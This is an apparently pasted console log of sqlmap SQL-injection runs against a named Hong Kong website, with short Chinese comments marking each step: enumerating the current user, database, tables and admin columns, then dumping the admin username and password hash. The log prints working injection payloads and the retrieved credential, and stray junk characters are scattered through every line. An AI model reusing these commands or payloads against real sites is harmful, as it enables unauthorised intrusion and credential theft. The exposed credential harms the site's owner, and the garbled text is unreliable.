D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db2 q5 D- s, ]5 P* D8 B
ms "Mysql" --current-user /* 注解:获取当前用户名称* u, Z; A9 |+ `- k% S# @
sqlmap/0.9 - automatic SQL injection and database takeover tool
7 q( p1 J6 V' e" y4 W P http://sqlmap.sourceforge.net starting at: 16:53:54
% ]$ t& @ P9 a3 y, L5 U[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as- }! t) O4 A& e1 A D
session file4 F% J' z5 }* P: z+ X
[16:53:54] [INFO] resuming injection data from session file- s' z# w3 P/ p+ ?) l
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ B; q* Y0 O. I' W+ V
[16:53:54] [INFO] testing connection to the target url L4 q/ L9 C& S% s7 G' N
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 f) b: ^$ K4 ~' m0 i& j& z$ B* Q7 nsts:
: L5 P; ?; T+ q/ c, ? e" K---. N2 k- e; h3 v$ |% F9 s
Place: GET
* p1 L3 Z, [/ uParameter: id
0 F2 m. j7 m! L, b( O4 G2 D' } Type: boolean-based blind
d" R; b# R( G/ P Title: AND boolean-based blind - WHERE or HAVING clause
- H Q" d1 C+ I) D. _ Payload: id=276 AND 799=799
) U; ~; N- ?: W Type: error-based8 l3 R5 i; c7 D8 v; G7 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 Y7 c( y% ~: S+ J- m$ [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 y2 D0 } G) \# z) n& m X
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
e: T0 P5 ~7 n& J, |% c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" v0 h; k4 K! Z. ]+ `
Type: UNION query
4 V. j) Z7 O8 X" z. B3 i Title: MySQL UNION query (NULL) - 1 to 10 columns
' v5 W8 t# e2 f& B Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 @% ^4 M6 I3 B
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ |) e) z' ]7 g% Z6 WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) g, F% p2 t4 Q- I4 v. B+ b Type: AND/OR time-based blind/ [, ~% z; D }1 v
Title: MySQL > 5.0.11 AND time-based blind
/ m" V9 N& j1 w5 G, F, A Payload: id=276 AND SLEEP(5)' C/ [7 p7 }2 k$ N
---
( h& J$ Y/ U' J8 N7 k[16:53:55] [INFO] the back-end DBMS is MySQL
/ Q1 ]0 q K5 s v, w( y% {- V5 vweb server operating system: Windows
; f/ X& X( P. }. c- Eweb application technology: Apache 2.2.11, PHP 5.3.0
# s0 R9 e; @/ R4 t, ~! g; j/ y/ ^back-end DBMS: MySQL 5.0, ?5 `( J% W5 `: i
[16:53:55] [INFO] fetching current user1 v- A* H+ {9 n! x
current user: 'root@localhost' n. J( n5 {: Y
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 I, z4 m' _; G' t
tput\www.wepost.com.hk' shutting down at: 16:53:58
; @) N6 e! c1 y6 A% l& |) d' b
; ]7 t2 z8 I( F& O PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" i% @! I0 v7 e( B; X$ I; S6 R
ms "Mysql" --current-db /*当前数据库
/ X3 b5 g0 b+ e+ N$ ~ sqlmap/0.9 - automatic SQL injection and database takeover tool
, v, v1 L/ k/ V* d# E4 d* m3 @4 K9 ? http://sqlmap.sourceforge.net starting at: 16:54:16
; k8 z6 j8 Y4 d$ B% W[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
# j+ F4 r- L F9 R$ b0 ` session file ~ ? I g% s8 ]- Z' N
[16:54:16] [INFO] resuming injection data from session file
' U2 w4 u( K* A }[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
) L, M1 T _ d) X[16:54:16] [INFO] testing connection to the target url4 B$ d, E( u3 n, x0 k
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
; [, e% l, p2 B9 H# u7 p; m Ysts:
# `+ L9 k7 \( d# P8 G- D---: _2 p+ q- U9 s/ a
Place: GET
( F; ]# u8 \) n4 IParameter: id
# e5 F$ N" }! j u, X* I Type: boolean-based blind) p. H+ R3 U' \ W7 K9 O1 M4 p
Title: AND boolean-based blind - WHERE or HAVING clause- Q. Q2 h( _. l/ m
Payload: id=276 AND 799=799+ ^# d+ J$ S* r& M0 m% n
Type: error-based
u+ b4 ^3 _8 S( s8 o" n2 l: U Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; I5 S! Z& v4 Q# V: q; e# D4 |- A' b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 h$ J/ [* j+ P# J6 [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 `- }+ W7 |; t' H3 h U, r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 v% T3 a# E6 e/ N: M" p Type: UNION query8 o+ G& g; h- }. D7 O
Title: MySQL UNION query (NULL) - 1 to 10 columns3 f4 {& m' h7 B W- W
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: t! d3 K& E% r* {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 k! P/ @& R4 ~- jCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; p, \$ s4 c& |/ ]+ K
Type: AND/OR time-based blind B- a% z. U! b! H( f3 I
Title: MySQL > 5.0.11 AND time-based blind
, ~+ T5 B. l# ~ Payload: id=276 AND SLEEP(5)
( ]1 f0 t* R6 |1 n! P$ v---
) k7 j( W7 ~& z6 F6 q; z[16:54:17] [INFO] the back-end DBMS is MySQL
q$ V% S; t: f* jweb server operating system: Windows; h, o9 R' [, U( V
web application technology: Apache 2.2.11, PHP 5.3.07 O( [% g- n2 A1 v, n+ E
back-end DBMS: MySQL 5.01 N# [% g* z+ Y6 C f) n
[16:54:17] [INFO] fetching current database
( M+ t/ Q9 Y0 e4 ` B7 I- Vcurrent database: 'wepost'. J9 G* {9 j, j% ?6 p; _; S6 i& I
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
1 Z4 A, ~. G- atput\www.wepost.com.hk' shutting down at: 16:54:18) Y @+ g4 n8 ]# w# K
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
7 u# w- |- j4 l9 S: F' `ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
* D) W' }/ ~ r; J* t, ` sqlmap/0.9 - automatic SQL injection and database takeover tool
z4 l# y; L4 C9 |& Q! {9 V5 z- j http://sqlmap.sourceforge.net starting at: 16:55:25
% W3 ~# M# i: `! X ~0 F1 i[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) S5 H8 ]+ k8 c# j q! j session file4 j- H: W& e4 ]# r, G# h, M# C# A
[16:55:25] [INFO] resuming injection data from session file( a5 j1 E# i. k: S. l. f* E7 }
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ T8 m/ _6 x+ B8 L* \[16:55:25] [INFO] testing connection to the target url
$ ~' ^0 G& M) X. A0 g, S8 C( w6 Q1 ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque& f; Y' Y$ n( _, G8 M% z* d
sts:( x8 j3 E v3 D1 H6 D7 u% L
---
! O; \) \: U! l3 `; ^& WPlace: GET- j E; S- O Z) h# \3 x
Parameter: id6 Y, d, B' F9 R9 l
Type: boolean-based blind
! F# c U# {+ f/ F1 r Title: AND boolean-based blind - WHERE or HAVING clause
9 i' x( J g# ?- ?+ b Payload: id=276 AND 799=799: e6 I4 o: L- C
Type: error-based
0 T) J6 K! T+ U8 T- h; L Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 l/ g% {3 Z. ]6 z8 r" _9 n Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
) |" R' V! u1 t! f% y4 f8 x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. l6 O8 j9 C6 R, o: w
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); O9 Y0 X5 k1 c |: o
Type: UNION query
$ V- ?# s7 }/ O" F' {! l Title: MySQL UNION query (NULL) - 1 to 10 columns: ]$ R0 T, S7 M7 n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& w. R2 ^1 ~! r(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," m# j$ }. ]( ]. d+ L+ {7 Q( m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 \, Z4 t9 ^; C E& i; ^& n
Type: AND/OR time-based blind
- ]0 m3 A& u: M Title: MySQL > 5.0.11 AND time-based blind
( ?1 J- ~, ^9 h1 f/ e* }: V$ g, F" T# O Payload: id=276 AND SLEEP(5)
0 d( [) h, o, i* n' I, a) [! T---
6 V' {. R8 C: u& q[16:55:26] [INFO] the back-end DBMS is MySQL
4 G% U* U- z3 ?1 U) i) ]. mweb server operating system: Windows
( F3 g8 m7 i, @8 y' x$ Qweb application technology: Apache 2.2.11, PHP 5.3.0+ d! S" R4 @6 X! c7 h" e
back-end DBMS: MySQL 5.0
; V4 k- y$ @2 |: ][16:55:26] [INFO] fetching tables for database 'wepost'
# u+ U- t9 ^7 U' u" @2 }[16:55:27] [INFO] the SQL query used returns 6 entries$ u# S G+ j0 W4 W* Z8 t! h) s; K
Database: wepost
. ~2 ~; O4 G! y' U[6 tables]. s* h! J F' c) I& \% y4 E
+-------------+
# O% t. Y0 a1 T1 {% W4 Y' Y4 Q" {| admin |
) {" q1 o9 x0 s# A| article |6 K" T5 A! w) S4 B. i. ~
| contributor |
8 F' \) h0 S! V( ?| idea | s( i" M0 ]1 U: _
| image |+ g3 | @2 l% b: X) D9 V5 r
| issue |7 d+ _3 N2 e, |5 i
+-------------+ @( e: g9 M5 y9 U; A, @# p
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 K: H. F9 W% F" U* Q6 `! Stput\www.wepost.com.hk' shutting down at: 16:55:33* w3 `; x$ g7 B# i+ [" Z
3 U. d9 D: z" ]% V T; `D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 c! d, K# |- t5 T
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
# q- Z: T2 X+ H' Z! o; ~ sqlmap/0.9 - automatic SQL injection and database takeover tool3 m1 B* y- w' r( _
http://sqlmap.sourceforge.net starting at: 16:56:06" \3 X: Y, \# g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
, ]+ w- w3 [6 ?1 Jsts:
1 c# W4 f5 k" I' v2 T---
) ~$ z5 ?# e* d, o; _Place: GET
3 W6 S, n! i% ]1 C! }# g7 s+ oParameter: id
3 K, f& \4 a, A: a Type: boolean-based blind
; n! D3 Q2 O8 y# Q$ E; Z Title: AND boolean-based blind - WHERE or HAVING clause
! a L$ ]( L0 x8 O Payload: id=276 AND 799=7992 E! I" r. ]3 S5 X9 ?# E& L9 S0 v: h
Type: error-based
) t! v2 p" N! B1 T1 }# R Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- s/ G6 p" b1 N Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 _# { T9 Z, i1 ]% B( h8 f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 Q3 A2 e& w7 R: l
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 p1 ^! T7 J" v" B1 d Type: UNION query
. O8 p2 G9 O2 {0 @ Title: MySQL UNION query (NULL) - 1 to 10 columns
2 T8 o x# o. g! ?2 |* _0 l/ v' J( R Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# D# W: Y/ B. M* V- f8 t- u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 H6 G# U% }* }/ [; o l
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 R) L. b7 E, p+ [; ? Type: AND/OR time-based blind; B w3 C9 u3 K" x0 K
Title: MySQL > 5.0.11 AND time-based blind
( r! ?) ?1 B1 A9 A* ]' | Payload: id=276 AND SLEEP(5)
+ E' [) |1 e4 s) l% L+ S3 g---* H1 P+ f' ]9 j4 ] j9 B0 B; o
web server operating system: Windows
% y6 D* M2 m! W, V! t! Q8 X! @; Lweb application technology: Apache 2.2.11, PHP 5.3.0
+ c1 s( c5 e( aback-end DBMS: MySQL 5.00 V/ u# K/ T% E5 l0 k& ~
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
6 o. {4 L' ?2 K% J9 nssion': wepost, wepost
) `7 M! i0 U. E1 }) lDatabase: wepost
' N" T5 R; S- K& c/ }" E4 k8 NTable: admin
( j J V3 E! o- ~6 T[4 columns]
' ?! m, Q% Y6 p1 ?" W7 L, Y- Z9 S+----------+-------------+
: Y) R. e; i+ X| Column | Type |
. A; W% ]' X! _# E+----------+-------------+* j& j/ T1 V7 o# S
| id | int(11) | b9 T4 B7 Z3 X e% p2 |
| password | varchar(32) |
( {8 y2 _' h* U8 L2 }3 _0 ]2 H| type | varchar(10) |
% O4 T+ g6 A" X% f; ?| userid | varchar(20) |* o5 O6 u, j7 h- N0 k
+----------+-------------+
. Z) Z& J7 M2 L/ R6 U shutting down at: 16:56:19# _( G; b& {2 l* a& W3 E
: Y7 p' I6 h. M O' l6 {, lD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db ~3 f) c1 E$ l) s
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容: x1 U8 o+ a: p8 ?
sqlmap/0.9 - automatic SQL injection and database takeover tool8 A) \; o1 V' w# q4 `7 {
http://sqlmap.sourceforge.net starting at: 16:57:14
" W- @7 v$ S8 J' T; U1 Wsqlmap identified the following injection points with a total of 0 HTTP(s) reque
' q8 N! X" d1 a( } b& {sts:% w1 F* b7 R# z
---1 G# c+ b0 l, b' N) p
Place: GET
9 p& r" \6 S$ G3 q! x1 RParameter: id
* |9 {5 {0 n4 k! c Type: boolean-based blind, ~! `3 O, c( X6 L0 t, x
Title: AND boolean-based blind - WHERE or HAVING clause5 }# z3 ^0 [% m2 f W8 P
Payload: id=276 AND 799=799( ?! i1 }1 W) N$ I2 q7 {4 P
Type: error-based0 B2 f& Q$ o0 Q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 W8 h. y+ U: ]: e9 {2 ?- Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 m0 `- J4 I) B. a- B3 ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 J9 w1 a) \7 `) f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) V; H# l0 Q* Z0 S
Type: UNION query# f' ]2 W2 U- g2 h
Title: MySQL UNION query (NULL) - 1 to 10 columns
0 V* \8 m9 d- c3 W1 |/ A Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% a4 E- l4 i/ W: C x/ z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ z2 s( Y. {# I5 Z# N+ O4 |* a) Y
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* j" w9 @- Z _# a Type: AND/OR time-based blind9 n1 Q+ B. Z. u' S
Title: MySQL > 5.0.11 AND time-based blind
" ^7 u0 i. h- _: N7 F Payload: id=276 AND SLEEP(5)
/ T: J8 v X% r1 S# I---# { a8 y2 e& l' f) k. |* V
web server operating system: Windows
# f$ Z3 I! G4 F1 f, Kweb application technology: Apache 2.2.11, PHP 5.3.0! y! k! Q4 m. o W# ^
back-end DBMS: MySQL 5.0
8 I9 I, e8 C( H0 n$ _recognized possible password hash values. do you want to use dictionary attack o
7 z# t( y$ i# }' `n retrieved table items? [Y/n/q] y2 x9 y$ `" p$ M+ k) o3 z" L, `: r
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
- D! X8 r* |7 f+ k$ G9 `0 ydo you want to use common password suffixes? (slow!) [y/N] y
" ^& B% g0 Q* Q9 m" u) QDatabase: wepost
0 q* Y0 i/ ^5 p1 c2 d0 BTable: admin/ c3 `: v: [; M& F. Y
[1 entry]* Y) D' n; |) D+ G# @8 s4 \4 D
+----------------------------------+------------+& o+ H" A6 A! @: z% M" t$ J
| password | userid |
- [* ]( b5 w) `* N$ _0 k, v+----------------------------------+------------+
7 |. f8 W* L/ A2 |( |- @| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |# w/ H7 j7 ]" _! V
+----------------------------------+------------+
& X: ^& @3 j. b1 I% m& r1 A3 C* E! T8 W, i shutting down at: 16:58:14, Y {1 H, y9 e' @, z( O
3 b# a4 y& d+ p- w6 ?
D:\Python27\sqlmap> |